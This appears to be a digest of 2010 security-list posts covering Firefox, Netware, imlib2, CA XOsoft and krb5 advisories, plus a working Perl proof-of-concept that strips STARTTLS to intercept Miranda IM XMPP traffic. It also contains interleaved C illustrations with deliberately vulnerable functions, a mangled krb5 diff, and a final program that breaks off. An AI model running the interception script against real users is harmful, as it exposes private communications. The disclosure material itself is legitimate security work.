ZDI-10-063: Mozilla Firefox Cross Document DOM Node Moving Code Execution Vulnerability
ZDI-10-063: Mozilla Firefox Cross Document DOM Node Moving Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-063
April 5, 2010

-- CVE ID:
CVE-2010-1121

-- Affected Vendors:
Mozilla Firefox

-- Affected Products:
Mozilla Firefox 3.6.x

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 9666. For further product information on the TippingPoint IPS, visit:

    http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to bypass specific script execution enforcements on vulnerable installations of Mozilla Firefox. User interaction is required to exploit this vulnerability in that the target must visit a malicious page.

The specific flaw exists when moving DOM nodes between documents with a specific timing while triggering garbage collection. If timed correctly, Firefox will incorrectly reference a previously freed object, which can be leveraged by an attacker to execute arbitrary code in the context of the current user.

-- Vendor Response:
Mozilla Firefox has issued an update to correct this vulnerability. More details can be found at:

    http://www.mozilla.org/security/announce/2010/mfsa2010-25.html

-- Disclosure Timeline:
2010-03-26 - Vulnerability reported to vendor
2010-04-05 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
    * Nils of MWR InfoSecurity (http://twitter.com/MWRlabs)

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at:

    http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at:

    http://www.zerodayinitiative.com/advisories/disclosure_policy/

Follow the ZDI on Twitter:

    http://twitter.com/thezdi
ZDI-10-062: Novell Netware NWFTPD RMD/RNFR/DELE Argument Parsing Remote Code Execution Vulnerabilities
ZDI-10-062: Novell Netware NWFTPD RMD/RNFR/DELE Argument Parsing Remote Code Execution Vulnerabilities
http://www.zerodayinitiative.com/advisories/ZDI-10-062
April 5, 2010

-- CVE ID:
CVE-2010-0625

-- Affected Vendors:
Novell

-- Affected Products:
Novell Netware

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 6331. For further product information on the TippingPoint IPS, visit:

    http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of the Novell Netware NWFTPD daemon. Authentication or default anonymous access is required to exploit this vulnerability.

The specific flaw exists when parsing malformed arguments to the verbs RMD, RNFR, and DELE. Overly long parameters result in stack-based buffer overflows, which can be leveraged to execute arbitrary code.

-- Vendor Response:
Novell states:

A public fix for this issue has been released in download nwftpd16.zip, available at http://download.novell.com/patch/finder/

-- Disclosure Timeline:
2008-08-26 - Vulnerability reported to vendor
2010-04-05 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
    * Nick DeBaggis
    * Francis Provencher
Vulnerabilities in TAK cms
Hello Bugtraq!

I want to warn you about security vulnerabilities in TAK cms. It's a Ukrainian commercial CMS.

- Advisory: Vulnerabilities in TAK cms
- URL: http://websecurity.com.ua/4050/
- Timeline:
04.02.2009 - found the vulnerabilities.
30.09.2009 - informed the owners of the web sites where I found these vulnerabilities. Given that I did not find any contact data for the developer of TAK cms, I hope that the owners of those sites informed him about these vulnerabilities. This is one of those cases with a commercial CMS where the developers left no contact data and there is no information about them on the Internet.
19.03.2010 - disclosed at my site.

- Details:
These are Insufficient Anti-automation and Brute Force vulnerabilities.

Insufficient Anti-automation:
http://site/about/contacts/
http://site/register/getpassword/
On these pages there is no protection against automated requests (captcha).

Brute Force:
http://site/auth/
http://site/admin/
The login forms have no protection against Brute Force attacks.

All versions of TAK cms are vulnerable.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[SECURITY] [DSA 2029-1] New imlib2 packages fix arbitrary code execution
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-2029-1                    secur...@debian.org
http://www.debian.org/security/                                Nico Golde
April 5th, 2010                        http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : imlib2
Vulnerability  : several
Problem type   : local
Debian-specific: no
Debian bug     : 576469
CVE ID         : CVE-2008-6079

It was discovered that imlib2, a library to load and process several image formats, did not properly process various image file types. Several heap and stack based buffer overflows - partly due to integer overflows - in the ARGB, BMP, JPEG, LBM, PNM, TGA and XPM loaders can lead to the execution of arbitrary code via crafted image files.

For the stable distribution (lenny), this problem has been fixed in version 1.4.0-1.2+lenny1.

For the testing distribution (squeeze), this problem has been fixed in version 1.4.2-1.

For the unstable distribution (sid), this problem has been fixed in version 1.4.2-1.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 5.0 alias lenny
- --------------------------------

Debian (stable)
- ---------------

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.
Source archives:

  http://security.debian.org/pool/updates/main/i/imlib2/imlib2_1.4.0-1.2+lenny1.dsc
    Size/MD5 checksum:     1152 b7cae77599a1ea2301395e18937d7788
  http://security.debian.org/pool/updates/main/i/imlib2/imlib2_1.4.0.orig.tar.gz
    Size/MD5 checksum:   845017 1f7f497798e06085767d645b0673562a
  http://security.debian.org/pool/updates/main/i/imlib2/imlib2_1.4.0-1.2+lenny1.diff.gz
    Size/MD5 checksum:    58816 01418de90dce3c411ff6794b5d9e06cd

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/i/imlib2/libimlib2_1.4.0-1.2+lenny1_alpha.deb
    Size/MD5 checksum:   238740 5d728b77bdaf3ad6c9b7ec58d6e0348f
  http://security.debian.org/pool/updates/main/i/imlib2/libimlib2-dev_1.4.0-1.2+lenny1_alpha.deb
    Size/MD5 checksum:   430388 688de8efff4ab7f8612e46ab68febd5e

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/i/imlib2/libimlib2-dev_1.4.0-1.2+lenny1_amd64.deb
    Size/MD5 checksum:   374282 62e14bee1f8870b98bf76c04e3e7145f
  http://security.debian.org/pool/updates/main/i/imlib2/libimlib2_1.4.0-1.2+lenny1_amd64.deb
    Size/MD5 checksum:   220686 9d34ec5aa25ea6b531923d3db2553a4c

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/i/imlib2/libimlib2-dev_1.4.0-1.2+lenny1_arm.deb
    Size/MD5 checksum:   340058 1e256f1b506e43e0c2d296fa6ea138ec
  http://security.debian.org/pool/updates/main/i/imlib2/libimlib2_1.4.0-1.2+lenny1_arm.deb
    Size/MD5 checksum:   206844 ce0402a348fb8dba20940c71ddde04f2

armel architecture (ARM EABI)

  http://security.debian.org/pool/updates/main/i/imlib2/libimlib2-dev_1.4.0-1.2+lenny1_armel.deb
    Size/MD5 checksum:   342736 a9411677d132fbb85d89e0fae6edb22f
  http://security.debian.org/pool/updates/main/i/imlib2/libimlib2_1.4.0-1.2+lenny1_armel.deb
    Size/MD5 checksum:   215890 c80a62ed059ffd37d759e9192a22f220

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/i/imlib2/libimlib2-dev_1.4.0-1.2+lenny1_hppa.deb
    Size/MD5 checksum:   389348 7800351accb00c01d81b7bf5a99b88d7
  http://security.debian.org/pool/updates/main/i/imlib2/libimlib2_1.4.0-1.2+lenny1_hppa.deb
    Size/MD5 checksum:   227236 5b4a108161ef87f6907d35895bba46b9

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/i/imlib2/libimlib2_1.4.0-1.2+lenny1_i386.deb
    Size/MD5 checksum:   208152 ae8a6d6ac41ea4969133270f73dae53f
  http://security.debian.org/pool/updates/main/i/imlib2/libimlib2-dev_1.4.0-1.2+lenny1_i386.deb
    Size/MD5 checksum:   334920 1fa233439d1346ff20e637648d9e878d

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/i/imlib2/libimlib2-dev_1.4.0-1.2+lenny1_ia64.deb
    Size/MD5 checksum:   461632 27e0586a22c9232dc7d878bc242b391b
  http://security.debian.org/pool/updates/main/i/imlib2/libimlib2_1.4.0-1.2+lenny1_ia64.deb
    Size/MD5 checksum:   298746 133afe4b754ba5c17142e06afdfff6a1

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/i/imlib2/libimlib2-dev_1.4.0-1.2+lenny1_mipsel.deb
    Size/MD5 checksum:   372840
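The loader bugs in this advisory share one root cause: the pixel-buffer size is derived from dimensions read out of the file, and the multiplication wraps before the result reaches the allocator, so a small buffer is allocated and the decoder then writes the full image into it. The following C program is an added illustration of that pattern and its fix; it is not imlib2 code or anything from the Debian package. The `naive_size32`, `checked_size32` and `pnm_*` names, the 32-bit size accumulator, and the PPM headers it parses are all constructed for the example.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Vulnerable pattern: the pixel-buffer size is computed from file-supplied
 * dimensions in 32-bit arithmetic. 65536 x 65536 x 1 is exactly 2^32, which
 * wraps to 0, so the allocator returns a tiny buffer and the decoder then
 * writes 2^32 bytes of pixel data into it (heap overflow). */
uint32_t naive_size32(uint32_t w, uint32_t h, uint32_t bpp)
{
    return w * h * bpp;   /* unsigned wrap-around, deliberately unchecked */
}

/* Hardened: multiply in 64 bits, reject zero dimensions, and reject any
 * product that does not fit the 32-bit size the loader works with.
 * Returns the byte count, or -1 when the request must be refused. */
int64_t checked_size32(uint32_t w, uint32_t h, uint32_t bpp)
{
    if (w == 0 || h == 0 || bpp == 0)
        return -1;
    uint64_t pixels = (uint64_t)w * h;
    if (pixels > UINT32_MAX)
        return -1;
    uint64_t bytes = pixels * bpp;   /* cannot exceed 2^64: both factors < 2^32 */
    if (bytes > UINT32_MAX)
        return -1;
    return (int64_t)bytes;
}

/* Minimal header parser for binary PPM ("P6 <w> <h> <maxval>"), one of the
 * PNM variants the advisory's PNM loader handles. Real loaders also skip
 * comment lines; that is omitted here. Returns the validated RGB buffer
 * size in bytes, or -1 if the header is rejected. */
int64_t pnm_buffer_size(const char *header)
{
    unsigned long w, h, maxval;
    if (sscanf(header, "P6 %lu %lu %lu", &w, &h, &maxval) != 3)
        return -1;
    if (maxval == 0 || maxval > 255)          /* 8-bit samples only */
        return -1;
    if (w > UINT32_MAX || h > UINT32_MAX)     /* only bites where long is 64-bit */
        return -1;
    return checked_size32((uint32_t)w, (uint32_t)h, 3);
}

/* Allocate only after validation; anything hostile yields NULL, not a
 * too-small buffer. */
unsigned char *pnm_alloc_pixels(const char *header)
{
    int64_t n = pnm_buffer_size(header);
    if (n < 0)
        return NULL;
    return malloc((size_t)n);
}

int main(void)
{
    /* Constructed headers: a benign 640x480 image and a hostile 65536x65536 one. */
    const char *benign  = "P6\n640 480\n255\n";
    const char *hostile = "P6\n65536 65536\n255\n";

    printf("naive   hostile size: %u bytes (wrapped)\n", naive_size32(65536, 65536, 3));
    printf("checked benign  size: %lld bytes\n", (long long)pnm_buffer_size(benign));
    printf("checked hostile size: %lld (rejected)\n", (long long)pnm_buffer_size(hostile));

    unsigned char *px = pnm_alloc_pixels(benign);
    free(px);
    return 0;
}
```

The 64-bit intermediate is the portable form of the check; where the toolchain offers it, `__builtin_mul_overflow` expresses the same test in one call. Whatever the mechanism, the rule is the same: the size is validated once, before the allocation, and the decoder never sees dimensions that did not pass.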
Miranda TLS MitM with XMPP/Jabber protocol
The Miranda IM instant messaging software silently falls back to unencrypted connections if a Jabber/XMPP server does not report that it supports TLS, even if "Use TLS" is checked. This allows an active attacker to perform MitM attacks on Jabber/XMPP connections which the user assumes to be secure.

Proof of concept MitM server attached.

The Miranda IM team was notified via the bugtracker. The issue was closed without being fixed, probably because of confusion with another, similar issue (posted here before: seemingly unrelated configuration settings could completely disable TLS; that one was fixed). I commented twice that this bug is not fixed, but no response was seen.

Workaround: Use SSL.

#!/usr/bin/perl
# Miranda IM TLS MitM Proof of Concept
# by Jan Schejbal, 2010-03-19
# MAY WORK WITHOUT MODIFICATIONS AGAINST OTHER CLIENTS WITH THIS ISSUE!
# Generally: Will work if client also accepts unencrypted connections
# if the server reports that TLS is not supported.
# Tested only on WinXP SP3 with ActivePerl 5.10.0
# against Miranda 0.8.16
# Usage:
# 1. Setup variables below, unless you want to test against jabber.ccc.de
#    (note that this script does not do real XML parsing. Other servers
#    might have slightly different code that will not be detected.
#    In such a case, connecting will lock up. Adapt the RegExp below.)
# 2. Make 'victim' connect to this server instead of real server
#    Network -> Jabber -> Account -> Manually specify connection host
#    (real attacks would use ARP spoofing, DNS spoofing or similar.)
# 3. Enable 'Use TLS'
#    (make sure that 'Disable SASL' on advanced is UNCHECKED,
#    as it silently disables TLS!)
# 4. Start script and connect with miranda
# 5. If all works, the dump goes to STDOUT, state is shown on STDERR.
#    (All traffic should be sent in plain now!)

use strict;
use warnings;
use IO::Socket;
use IO::Select;

my $server     = 'jabber.ccc.de';   # real XMPP server the traffic is relayed to
my $port       = 5222;
my $listenport = $port;             # port the victim client is pointed at

my $sock = IO::Socket::INET->new(
    LocalHost => '0.0.0.0',
    LocalPort => $listenport,
    Proto     => 'tcp',
    Listen    => 1,
    Reuse     => 1,
) or die "listen on $listenport failed: $!";

print STDERR "Listening on $listenport for jabber connections\n";
print STDERR "Will forward to $server:$port\n";

my $client_connection = $sock->accept();
print STDERR "Incoming connection\n";

my $server_connection = IO::Socket::INET->new(
    PeerAddr => $server,
    PeerPort => $port,
    Proto    => 'tcp',
) or die "connect to $server:$port failed: $!";
print STDERR "Connected to server\n";

$server_connection->blocking(0);
$client_connection->blocking(0);

my $sel = IO::Select->new();
$sel->add($server_connection);
$sel->add($client_connection);

my $server_hello_done = 0;    # set once the STARTTLS offer has been stripped
my $server_hello_data = '';   # server bytes held back until the offer is found
my $readdata;
my @ready;

while (@ready = $sel->can_read()) {
    foreach my $ready_conn (@ready) {
        # One byte at a time, so the <starttls/> element is caught wherever
        # it falls relative to read boundaries.
        if (!sysread($ready_conn, $readdata, 1)) {
            print STDERR "\nReading failed!\n";
            exit(1);
        }
        print $readdata;    # raw dump of everything seen, both directions

        if ($ready_conn == $server_connection) {
            # read was from server
            if (!$server_hello_done) {
                # Buffer the server's stream features until the STARTTLS offer
                # has been removed; only then hand them to the client.
                $server_hello_data .= $readdata;
                print STDERR "\nCurrent server hello buf: $server_hello_data\n\n";
                if ($server_hello_data =~ s|<starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>||) {
                    print STDERR "removed STARTTLS offer from server hello\n";
                    $server_hello_done = 1;
                    print $client_connection $server_hello_data;
                    print STDERR "\nforwarded cached server hello buf: \n$server_hello_data\n\n";
                    print STDERR "MitM complete. Forwarding data ('<' = to client, '>' = to server)\n";
                }
            } else {
                print $client_connection $readdata;
                print STDERR '<' if $server_hello_done;
            }
        } else {
            # read was from client, send to server
            print $server_connection $readdata;
            print STDERR '>' if $server_hello_done;
        }
    }
}
Hack.lu 2010 CfP
Call for Papers Hack.lu 2010

The purpose of the hack.lu convention is to give an open and free playground where people can discuss the implications of new technologies in society. hack.lu is a balanced mix convention where technical and non-technical people can meet each other and share freely all kinds of information.

The convention will be held in the Grand-Duchy of Luxembourg in October 2010 (27-29.10.2010).

The most significant new discoveries about computer network attacks and defenses, commercial security solutions, and pragmatic real-world security experience will be presented in a three-day series of informative tutorials. We would like to announce the opportunity to submit papers and/or lightning talk proposals for selection by the hack.lu technical review committee. This year we will be doing workshops on the first day and talks of 1 hour or 30 minutes in the main track on the two following days.

Scope
=====

Topics of interest include, but are not limited to:

* Software Engineering and Security
* Honeypots/Honeynets
* Spyware, Phishing and Botnets (Distributed attacks)
* Newly discovered vulnerabilities in software and hardware
* Electronic/Digital Privacy
* Wireless Network and Security
* Attacks on Information Systems and/or Digital Information Storage
* Electronic Voting
* Free Software and Security
* Assessment of Computer, Electronic Devices and Information Systems
* Standards for Information Security
* Legal and Social Aspects of Information Security
* Security in Information Retrieval
* Network Security
* Forensics and Anti-Forensics
* Mobile Communications Security and Vulnerabilities

Deadlines
=========

The following dates are important if you want to participate in the CfP:

Abstract submission   : no later than 1st June 2010
Full paper submission : no later than 15th July 2010
Notification date     : mid August

Submission guideline
====================

Authors should submit a paper in English of up to 5,000 words, using a non-proprietary and open electronic format. The program committee will review all papers and the author of each paper will be notified of the result by electronic means. The abstract is up to 400 words.

Submissions must be sent to http://2010.hack.lu/cfp/

Submissions should also include the following:

1. Presenter, geographical location (country of origin/passport) and contact info.
2. Employer and/or affiliations.
3. Brief biography, list of publications or papers.
4. Any significant presentation and/or educational experience/background.
5. Reason why this material is innovative or significant or an important tutorial.
6. Optionally, any samples of prepared material or outlines ready.
7. Whether the submission has already been presented, and where.

Presentations/topics that haven't been presented before will be rewarded.

The information will be used only for the sole purpose of the hack.lu convention, including the information on the public website. If you want to remain anonymous, you have the right to use a nickname.

If the paper is not accepted in the main track, it could be accepted in the short or lightning talk session, but in this case the speakers' privileges are not applicable.

Speakers' Privileges
====================

* Accommodation will be provided (3 nights)
* Travel expenses will be covered up to a max amount
* Conference speakers night

Publication and rights
======================

Authors keep the full rights on their publication/papers but give an unrestricted right to redistribute their papers for the hack.lu convention and its related electronic/paper publication.

Sponsoring
==========

If you want to support the initiative and gain visibility by sponsoring, please contact us by writing an e-mail to info(AT)hack.lu

Web site and wiki
=================

http://www.hack.lu/

CfP website: http://2010.hack.lu/cfp/
CA20100406-01: Security Notice for CA XOsoft
-----BEGIN PGP SIGNED MESSAGE-----

CA20100406-01: Security Notice for CA XOsoft

Issued: April 6, 2010

CA's support is alerting customers to multiple security risks with CA XOsoft products. Multiple vulnerabilities exist that can allow a remote attacker to gain sensitive information, cause a denial of service, or possibly execute arbitrary code. CA has issued patches to address the vulnerabilities.

The first vulnerability, CVE-2010-1221, occurs due to a lack of authentication. An attacker can make a SOAP request to enumerate user names. This vulnerability has a low risk rating and affects r12.0 and r12.5 XOsoft products.

The second vulnerability, CVE-2010-1222, occurs due to a lack of authentication. An attacker can make a SOAP request to gain potentially sensitive information. This vulnerability has a low risk rating and affects only r12.5 XOsoft products.

The third set of vulnerabilities, CVE-2010-1223, occurs due to insufficient bounds checking. An attacker can make a request that causes a buffer overflow, which may result in a crash or possibly code execution. These vulnerabilities have a high risk rating and affect r12.0 and r12.5 XOsoft products.

Risk Rating

High

Platform

Windows

Affected Products

CA XOsoft Replication r12.5
CA XOsoft High Availability r12.5
CA XOsoft Content Distribution r12.5
CA XOsoft Replication r12.0
CA XOsoft High Availability r12.0
CA XOsoft Content Distribution r12.0

Non-Affected Products

CA XOsoft Replication r4
CA XOsoft High Availability r4
CA XOsoft Content Distribution r4

How to determine if the installation is affected

1. Using Windows Explorer, locate the file mng_core_com.dll. By default, the file is located in the C:\Program Files\CA\XOsoft\Manager directory.
2. Right click on the file and select Properties.
3. Select the Version tab.
4. If the file version is earlier than indicated in the table below, the installation is vulnerable.

Product               File Name         File Version
XOsoft 12.5 products  mng_core_com.dll  12.5.2.563
XOsoft 12.0 products  mng_core_com.dll  5.0.5.128

Solution

CA issued the following patches to address the vulnerabilities.

CA XOsoft Replication r12.5, CA XOsoft High Availability r12.5, CA XOsoft Content Distribution r12.5:
RO15016

CA XOsoft Replication r12.0, CA XOsoft High Availability r12.0, CA XOsoft Content Distribution r12.0:
RO16643

References

CVE-2010-1221 - username enumeration
CVE-2010-1222 - information disclosure
CVE-2010-1223 - buffer overflows

CA20100406-01: Security Notice for CA XOsoft
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=232869

Acknowledgement

CVE-2010-1221, CVE-2010-1222, CVE-2010-1223 - Andrea Micalizzi aka rgod reported through the TippingPoint ZDI program

Change History

Version 1.0: Initial Release

If additional information is required, please contact CA Support at http://support.ca.com/

If you discover a vulnerability in CA products, please report your findings to the CA Product Vulnerability Response Team.
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782

Kevin Kotas
CA Product Vulnerability Response Team

-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1

iQEVAwUBS7txcJI1FvIeMomJAQEvnQf/ZQ+LZTLLRETjr06imXzcuT1KtlsvpLQj
s+h0HfJO36QYYHWpBENRIJliSQJqQSRY1Jzh0Zy2Ilxu4j5/sJsZS7QhCw+JXiP5
FHY+Hg6xkSazYkS2/9RAZWj47CYK/xg+PRhLcK6+WNwhvNDBj/sHCi+Ub8U9f+h3
K5qV9Lr4PrDJt5VZog41mqCSmRBvRmtKtEWm4nBp4ebE0drzzoscANBxTs60kExi
l8cMGoQR8OpHfHDTk70iRxN8+JDHNEI4qObgK1tgugq7TLrflk2Ts1pUKnxopXP2
L6TY+2ofP4L2dCxWDcb1FtYYNM34iHMnNXQa+tmSmyPqT9FIcu15CA==
=CUG9
-----END PGP SIGNATURE-----
ZDI-10-065: CA XOsoft xosoapapi.asmx Multiple Remote Code Execution Vulnerabilities
ZDI-10-065: CA XOsoft xosoapapi.asmx Multiple Remote Code Execution Vulnerabilities
http://www.zerodayinitiative.com/advisories/ZDI-10-065
April 6, 2010

-- CVE ID:
CVE-2010-1223

-- Affected Vendors:
Computer Associates

-- Affected Products:
Computer Associates XOsoft High Availability
Computer Associates XOsoft Replication

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter IDs 9504, 9507. For further product information on the TippingPoint IPS, visit:

    http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Computer Associates XOsoft Control Replication and High Availability Control Service. Authentication is not required to exploit this vulnerability.

The specific flaws exist within the /ws_man/xosoapapi.asmx SOAP endpoint and occur when submitting malformed requests to the server. Successful exploitation can lead to code execution in the context of the service.

-- Vendor Response:
Computer Associates has issued an update to correct this vulnerability. More details can be found at:

    https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=232869

-- Disclosure Timeline:
2009-12-16 - Vulnerability reported to vendor
2010-04-06 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
    * Andrea Micalizzi aka rgod
MITKRB5-SA-2010-003 [CVE-2010-0629] denial of service in kadmind in older krb5 releases
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

                 MITKRB5-SA-2010-003

MIT krb5 Security Advisory 2010-003
Original release: 2010-04-06
Last update: 2010-04-06

Topic: denial of service in kadmind in older krb5 releases

CVE-2010-0629
denial of service in kadmind in older krb5 releases

CVSSv2 Vector: AV:N/AC:L/Au:S/C:N/I:N/A:C/E:POC/RL:OF/RC:C

CVSSv2 Base Score:      6.8

Access Vector:          Network
Access Complexity:      Low
Authentication:         Single
Confidentiality Impact: None
Integrity Impact:       None
Availability Impact:    Complete

CVSSv2 Temporal Score:  5.3

Exploitability:         Proof-of-Concept
Remediation Level:      Official Fix
Report Confidence:      Confirmed

SUMMARY
=======

In previous MIT krb5 releases krb5-1.5 through krb5-1.6.3, the Kerberos administration daemon (kadmind) can crash due to referencing freed memory. A legitimate user can trigger this crash by using a newer version of the kadmin protocol than the server supports.

This is an implementation vulnerability in MIT krb5, and not a vulnerability in the Kerberos protocol.

This vulnerability is not present in modern releases of MIT krb5.

IMPACT
======

An authenticated remote attacker could crash the Kerberos administration daemon (kadmind), causing a denial of service.

AFFECTED SOFTWARE
=================

* kadmind in MIT releases krb5-1.5 through krb5-1.6.3.

FIXES
=====

* The krb5-1.7 release already contains a fix for this vulnerability.

* Apply the patch below. The corresponding SVN revision (r22427) in our source tree contains additional use-after-free bugfixes; we believe that it is impractical for an attacker to induce execution of these sections of code.

Index: src/kadmin/server/server_stubs.c === - --- src/kadmin/server/server_stubs.c (revision 22426) +++ src/kadmin/server/server_stubs.c(revision 22427)
@@ -1628,7 +1628,7 @@ } if (ret.code != 0) - - errmsg = krb5_get_error_message(handle ? handle-context : NULL, ret.code); +errmsg = krb5_get_error_message(NULL, ret.code); else errmsg = success;

This patch is also available at

    http://web.mit.edu/kerberos/advisories/2010-003-patch.txt

A PGP-signed patch is available at

    http://web.mit.edu/kerberos/advisories/2010-003-patch.txt.asc

REFERENCES
==========

This announcement is posted at:

    http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2010-003.txt

This announcement and related security advisories may be found on the MIT Kerberos security advisory page at:

    http://web.mit.edu/kerberos/advisories/index.html

The main MIT Kerberos web page is at:

    http://web.mit.edu/kerberos/index.html

This bug has been public for a while at

    http://krbdev.mit.edu/rt/Ticket/Display.html?id=5998

but the security consequence has not been previously widely known. The security consequence was first made public in a limited context in the Debian bug found at

    http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=567052

CVSSv2:

    http://www.first.org/cvss/cvss-guide.html
    http://nvd.nist.gov/cvss.cfm?calculatoradvversion=2

CVE: CVE-2010-0629

    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0629

ACKNOWLEDGMENTS
===============

Thanks to Sol Jerome for reporting the kadmind crash to Debian.

CONTACT
=======

The MIT Kerberos Team security contact address is krbcore-secur...@mit.edu. When sending sensitive information, please PGP-encrypt it using the following key:

pub   2048R/8B8DF501 2010-01-15 [expires: 2011-02-01]
uid                  MIT Kerberos Team Security Contact <krbcore-secur...@mit.edu>

DETAILS
=======

MIT krb5 bug #5998 contains the earliest description of this bug. Debian bug #567052 (referenced above) contains the first public indication of the security consequence of this bug.
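Review bot: in the server_stubs.c hunk at line 1628, the guard `handle ? handle->context : NULL` that the removed line relied on never protected this error path, because `handle` there is a freed but non-NULL kadm5_server_handle_t, so `handle->context` is a read of freed memory; the replacement `krb5_get_error_message(NULL, ret.code)` avoids that read, but it also means the reply carries only the generic string for `ret.code`, since any extended error text attached to the context is no longer consulted. If that text matters, fetch the message before the handle is released; either way, consider clearing `handle` at the free site so any remaining use faults deterministically instead of reading stale memory. (The `- -` prefix on the removed line is PGP dash-escaping of a single `-` diff marker, not part of the source.)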
Under error conditions, such as receiving an invalid kadmin API version number, the kadmin RPC stub init_2_svc() attempts to call krb5_get_error_message() on a krb5_context handle that is in a previously-freed kadm5_server_handle_t object. This typically results in a read operation on an invalid pointer, causing a crash and denial of service.

Releases prior to krb5-1.5 did not use extended error information in this way, and therefore do not include the vulnerable code.

The most likely cause of a crash is a legitimate user running a kadmin client from the krb5-1.8 or newer release, which sends an API version number not recognized by earlier releases.

REVISION HISTORY
================

2010-04-06 original release

Copyright (C) 2010 Massachusetts Institute of Technology
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (SunOS)

iEYEARECAAYFAku7ebMACgkQSO8fWy4vZo6cZwCg+gPn5RIWuKBbdZi0NktOh+pC
SNMAnj3SeOel4cx5v9SprM1MRZG/ERCQ
=mKjF
-----END PGP SIGNATURE-----
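The DETAILS section above describes a lifetime-ordering bug: the server handle is torn down on the error path, and the error text is then looked up through a context pointer that lives inside the freed handle. The C program below is an added illustration of that ordering and of the fix's shape; it is not MIT krb5 code. The `ex_context` and `ex_server_handle` types stand in for krb5_context and kadm5_server_handle_t (the real structures are opaque), `ex_get_error_message` stands in for krb5_get_error_message(), and the API version numbers and message strings are constructed for the example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical stand-ins for krb5_context and kadm5_server_handle_t; the real
 * structures are opaque and the ex_ names below are this example's own. */
typedef struct { char extended_msg[96]; } ex_context;
typedef struct { ex_context *context; int api_version; } ex_server_handle;

#define EX_SUPPORTED_API   2   /* assumed: newest kadmin API version the server knows */
#define EX_ERR_BAD_VERSION 1

ex_server_handle *ex_handle_new(int api_version)
{
    ex_server_handle *h = calloc(1, sizeof *h);
    if (h == NULL) abort();
    h->context = calloc(1, sizeof *h->context);
    if (h->context == NULL) abort();
    h->api_version = api_version;
    return h;
}

void ex_handle_free(ex_server_handle *h)
{
    free(h->context);
    free(h);
}

/* Stand-in for krb5_get_error_message(): with a context, return the extended
 * text attached to it; with NULL, return the generic string for the code. */
const char *ex_get_error_message(const ex_context *ctx, int code)
{
    if (ctx != NULL && ctx->extended_msg[0] != '\0')
        return ctx->extended_msg;
    return code == EX_ERR_BAD_VERSION ? "unsupported kadmin API version"
                                      : "unknown error";
}

/* Vulnerable ordering (never call this with an unsupported version): the
 * handle is torn down on the error path and only afterwards is the message
 * fetched through it. */
const char *ex_init_vulnerable(int client_api)
{
    ex_server_handle *h = ex_handle_new(client_api);
    if (client_api > EX_SUPPORTED_API) {
        snprintf(h->context->extended_msg, sizeof h->context->extended_msg,
                 "client API version %d not supported", client_api);
        ex_handle_free(h);
        /* h is freed but not NULL, so the guard is useless and h->context is a
         * read of freed memory: the crash described in the advisory. */
        return ex_get_error_message(h ? h->context : NULL, EX_ERR_BAD_VERSION);
    }
    ex_handle_free(h);
    return NULL;                               /* success */
}

/* Fixed ordering, the shape of the r22427 change: once the handle is gone,
 * nothing reads through it, and the message comes from the NULL-context
 * fallback. (If the extended text is wanted, copy it out before the free.) */
const char *ex_init_fixed(int client_api)
{
    ex_server_handle *h = ex_handle_new(client_api);
    if (client_api > EX_SUPPORTED_API) {
        ex_handle_free(h);
        return ex_get_error_message(NULL, EX_ERR_BAD_VERSION);
    }
    ex_handle_free(h);
    return NULL;
}

int main(void)
{
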